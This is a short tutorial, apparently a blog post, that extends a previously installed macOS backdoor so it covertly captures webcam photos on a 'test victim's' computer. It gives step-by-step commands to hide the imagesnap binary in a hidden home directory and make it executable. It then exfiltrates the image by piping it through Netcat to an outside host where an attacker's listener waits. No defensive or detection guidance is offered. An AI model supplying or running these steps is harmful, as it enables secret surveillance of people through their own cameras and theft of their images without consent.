Before following this tutorial, first read OSX Backdoor – Persistence.
Cameras come built-in on practically every Mac on the market. What’s even more interesting is that these cameras do not require special user permissions to access. This means that pictures can be taken by an attacker and viewed anywhere in the world, at any given moment. This can be a huge security and privacy exploit. Assuming that you have already configured and installed the backdoor discussed in OSX Backdoor – Persistence, lets add the ability to take pictures on a test victim’s computer.
./imagesnap Capturing image from device "Built-in iSight"...snapshot.jpg
Looking good! Now lets add this to our backdoor and add permission to execute.
cp imagesnap ~/.hidden/
Note: If you are copying imagesnap to the hidden directory via the backdoor itself, imagesnap will not have permission to execute. This is a built-in safeguard that OSX implements to prevent software from executing foreign code.You must run the following line to give it proper permissions.
chmod +x ~/.hidden/imagesnap
We have successfully hidden our imagesnap executable in the test victim’s home directory. Try taking a snapshot using our backdoor shell. Now lets send the snapshot home. First initiate a listener on the “attacking” computer with Netcat on port 1337.
nc -l -p 1337 > ~/Desktop/snapshot.jpg
After you have first initiated your listener, send the file from the victim’s computer by piping the image through Netcat.
cat ~/.hidden/snapshot.jpg | nc my.site.here.com 1337
Note: If you are executing this line via your backdoor, you will have to resolve ~/.hidden/ to /Users/username/.hidden/
If all went well, you should have a copy of the snapshot on your desktop.
Here is the complete project on Github. If you found this interesting, give a star. Thanks for reading.